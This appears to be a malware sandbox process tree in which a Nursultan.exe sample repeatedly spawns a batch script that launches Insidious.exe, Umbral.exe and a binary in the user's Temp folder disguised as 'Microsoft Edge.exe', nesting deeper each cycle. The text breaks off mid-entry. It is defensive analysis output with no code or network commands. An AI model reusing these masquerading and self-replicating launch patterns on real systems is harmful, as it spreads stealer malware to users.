C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
26⤵
PID:2360

C:\Windows\system32\cmd.exe
cmd
26⤵
PID:2696

C:\Windows\system32\chcp.com
chcp 65001
25⤵
PID:2468

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
25⤵
- Delays execution with timeout.exe
PID:2532

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
25⤵
PID:344

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
24⤵
- Suspicious behavior: EnumeratesProcesses
PID:1972

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
24⤵
PID:1796

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
24⤵
PID:2828

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
23⤵
PID:2176

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
24⤵
PID:1308

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
25⤵
PID:2824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
26⤵
PID:1844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
27⤵
PID:1444

C:\Windows\system32\cmd.exe
cmd
27⤵
PID:2324

C:\Windows\system32\chcp.com
chcp 65001
26⤵
PID:1896

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
26⤵
- Delays execution with timeout.exe
PID:640

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
26⤵
PID:2804

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
25⤵
- Suspicious behavior: EnumeratesProcesses
PID:1724

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
25⤵
PID:2964

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
25⤵
PID:2952

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
24⤵
PID:2732

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
25⤵
PID:2728

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
26⤵
PID:1580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
27⤵
PID:1816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
28⤵
PID:2584

C:\Windows\system32\cmd.exe
cmd
28⤵
PID:2888

C:\Windows\system32\chcp.com
chcp 65001
27⤵
PID:324

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
27⤵
- Delays execution with timeout.exe
PID:444

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
27⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
26⤵
- Suspicious behavior: EnumeratesProcesses
PID:448

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
26⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
26⤵
PID:2488

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
25⤵
PID:1332

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
26⤵
PID:2816

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
27⤵
PID:2176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
28⤵
PID:1444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
29⤵
PID:1740

C:\Windows\system32\cmd.exe
cmd
29⤵
PID:2960

C:\Windows\system32\chcp.com
chcp 65001
28⤵
PID:2456

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
28⤵
- Delays execution with timeout.exe
PID:892

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
28⤵
PID:2996

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
27⤵
- Suspicious behavior: EnumeratesProcesses
PID:1132

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
27⤵
PID:2132

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
27⤵
PID:1372

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
26⤵
PID:1520

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
27⤵
PID:1504

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
28⤵
PID:1720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
29⤵
PID:2528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
30⤵
PID:1536

C:\Windows\system32\cmd.exe
cmd
30⤵
PID:2584

C:\Windows\system32\chcp.com
chcp 65001
29⤵
PID:2044

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
29⤵
- Delays execution with timeout.exe
PID:1636

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
29⤵
PID:2256

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
28⤵
PID:1744

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
28⤵
PID:1900

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
28⤵
PID:996

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
27⤵
PID:2464

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
28⤵
PID:2732

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
29⤵
PID:2536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
30⤵
PID:1680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
31⤵
PID:1896

C:\Windows\system32\cmd.exe
cmd
31⤵
PID:540

C:\Windows\system32\chcp.com
chcp 65001
30⤵
PID:2752

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
30⤵
- Delays execution with timeout.exe
PID:2188

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
30⤵
PID:2788

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
29⤵
PID:2644

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
29⤵
PID:356

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
29⤵
PID:2052

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
28⤵
PID:2836

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
29⤵
PID:1880

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
30⤵
PID:540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
31⤵
PID:2256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
32⤵
PID:1540

C:\Windows\system32\cmd.exe
cmd
32⤵
PID:1576

C:\Windows\system32\chcp.com
chcp 65001
31⤵
PID:2676

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
31⤵
- Delays execution with timeout.exe
PID:2028

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
31⤵
PID:2892

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
30⤵
PID:1680

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
30⤵
PID:1676

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
30⤵
PID:452

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
29⤵
PID:2232

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
30⤵
PID:696

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
31⤵
PID:2888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
32⤵
PID:1764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
33⤵
PID:2828

C:\Windows\system32\cmd.exe
cmd
33⤵
PID:1132

C:\Windows\system32\chcp.com
chcp 65001
32⤵
PID:1896

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
32⤵
- Delays execution with timeout.exe
PID:1848

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
32⤵
PID:2644

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
31⤵
- Checks processor information in registry
PID:1972

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
31⤵
PID:1724

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
31⤵
PID:1192

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
30⤵
PID:2696

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
31⤵
PID:712

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
32⤵
PID:1796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
33⤵
PID:2240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
34⤵
PID:1052

C:\Windows\system32\cmd.exe
cmd
34⤵
PID:2188

C:\Windows\system32\chcp.com
chcp 65001
33⤵
PID:2356

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
33⤵
- Delays execution with timeout.exe
PID:884

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
33⤵
PID:2700

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
32⤵
PID:1844

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
32⤵
PID:324

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
32⤵
PID:2168

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
31⤵
PID:2996

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
32⤵
PID:2876

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
33⤵
PID:1320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
34⤵
PID:2732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
35⤵
PID:2256

C:\Windows\system32\cmd.exe
cmd
35⤵
PID:1792

C:\Windows\system32\chcp.com
chcp 65001
34⤵
PID:2104

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
34⤵
- Delays execution with timeout.exe
PID:2832

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
34⤵
PID:2212

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
33⤵
PID:2196

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
33⤵
PID:1060

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
33⤵
PID:332

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
32⤵
PID:2920

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
33⤵
PID:344

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
34⤵
PID:1836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
35⤵
PID:1628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
36⤵
PID:2404

C:\Windows\system32\cmd.exe
cmd
36⤵
PID:1724

C:\Windows\system32\chcp.com
chcp 65001
35⤵
PID:2496

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
35⤵
- Delays execution with timeout.exe
PID:376

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
35⤵
PID:1724

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
34⤵
PID:2600

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
34⤵
PID:3068

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
34⤵
PID:1740

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
33⤵
PID:2360

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
34⤵
PID:1340

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
35⤵
PID:1504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
36⤵
PID:2012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
37⤵
PID:884

C:\Windows\system32\cmd.exe
cmd
37⤵
PID:2700

C:\Windows\system32\chcp.com
chcp 65001
36⤵
PID:1052

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
36⤵
- Delays execution with timeout.exe
PID:1040

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
36⤵
PID:2264

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
35⤵
PID:2572

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
35⤵
PID:2636

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
35⤵
PID:904

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
34⤵
PID:2788

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
35⤵
PID:692

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
36⤵
PID:2428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
37⤵
PID:2744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
38⤵
PID:2752

C:\Windows\system32\cmd.exe
cmd
38⤵
PID:2732

C:\Windows\system32\chcp.com
chcp 65001
37⤵
PID:2572

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
37⤵
- Delays execution with timeout.exe
PID:332

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
37⤵
PID:1744

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
36⤵
PID:2468

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
36⤵
PID:2708

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
36⤵
PID:1880

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
35⤵
PID:2864

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
36⤵
PID:2324

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
37⤵
PID:2432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
38⤵
PID:1696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
39⤵
PID:952

C:\Windows\system32\cmd.exe
cmd
39⤵
PID:1636

C:\Windows\system32\chcp.com
chcp 65001
38⤵
PID:2968

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
38⤵
- Delays execution with timeout.exe
PID:2656

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
38⤵
PID:2684

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
37⤵
PID:1756

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
37⤵
PID:2168

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
37⤵
PID:2600

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
36⤵
PID:2828

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
37⤵
PID:2012

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
38⤵
PID:2644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
39⤵
PID:1916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
40⤵
PID:2524

C:\Windows\system32\cmd.exe
cmd
40⤵
PID:2504

C:\Windows\system32\chcp.com
chcp 65001
39⤵
PID:2392

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
39⤵
PID:1332

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
39⤵
PID:2928

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
38⤵
PID:700

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
38⤵
PID:1896

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
38⤵
PID:2648

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
37⤵
PID:1444

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
38⤵
PID:2028

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
39⤵
PID:3044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
40⤵
PID:924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
41⤵
PID:692

C:\Windows\system32\cmd.exe
cmd
41⤵
PID:1304

C:\Windows\system32\chcp.com
chcp 65001
40⤵
PID:2732

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
40⤵
- Delays execution with timeout.exe
PID:2456

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
40⤵
PID:692

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
39⤵
PID:2600

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
39⤵
PID:2196

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
39⤵
PID:2052

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
38⤵
PID:2724

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
39⤵
PID:448

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
40⤵
PID:1284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
41⤵
PID:2964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
42⤵
PID:1816

C:\Windows\system32\cmd.exe
cmd
42⤵
PID:640

C:\Windows\system32\chcp.com
chcp 65001
41⤵
PID:2372

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
41⤵
- Delays execution with timeout.exe
PID:2104

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
41⤵
PID:928

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
40⤵
PID:1844

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
40⤵
PID:408

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
40⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
39⤵
PID:2708

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
40⤵
PID:2532

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
41⤵
PID:1896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
42⤵
PID:2392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
43⤵
PID:2468

C:\Windows\system32\cmd.exe
cmd
43⤵
PID:2816

C:\Windows\system32\chcp.com
chcp 65001
42⤵
PID:640

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
42⤵
- Delays execution with timeout.exe
PID:1740

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
42⤵
PID:3020

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
41⤵
PID:2524

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
41⤵
PID:1696

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
41⤵
PID:2660

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
40⤵
PID:576

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
41⤵
PID:1040

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
42⤵
PID:356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
43⤵
PID:2624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
44⤵
PID:2012

C:\Windows\system32\cmd.exe
cmd
44⤵
PID:1444

C:\Windows\system32\chcp.com
chcp 65001
43⤵
PID:2816

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
43⤵
- Delays execution with timeout.exe
PID:2392

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
43⤵
PID:1900

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
42⤵
PID:2848

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
42⤵
PID:2028

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
42⤵
PID:836

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
41⤵
PID:3028

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
42⤵
PID:344

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
43⤵
PID:2240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
44⤵
PID:2424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
45⤵
PID:1808

C:\Windows\system32\cmd.exe
cmd
45⤵
PID:2848

C:\Windows\system32\chcp.com
chcp 65001
44⤵
PID:2716

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
44⤵
- Delays execution with timeout.exe
PID:2624

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
44⤵
PID:2360

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
43⤵
PID:2828

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
43⤵
PID:2600

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
43⤵
PID:1060

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
42⤵
PID:1192

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
43⤵
PID:2956

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
44⤵
PID:2504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
45⤵
PID:2716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
46⤵
PID:2168

C:\Windows\system32\cmd.exe
cmd
46⤵
PID:2564

C:\Windows\system32\chcp.com
chcp 65001
45⤵
PID:2832

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
45⤵
- Delays execution with timeout.exe
PID:1756

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
45⤵
PID:952

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
44⤵
PID:1696

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
44⤵
PID:3020

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
44⤵
PID:1132

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
43⤵
PID:592

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
44⤵
PID:884

C:\Windows\system32\cmd.exe
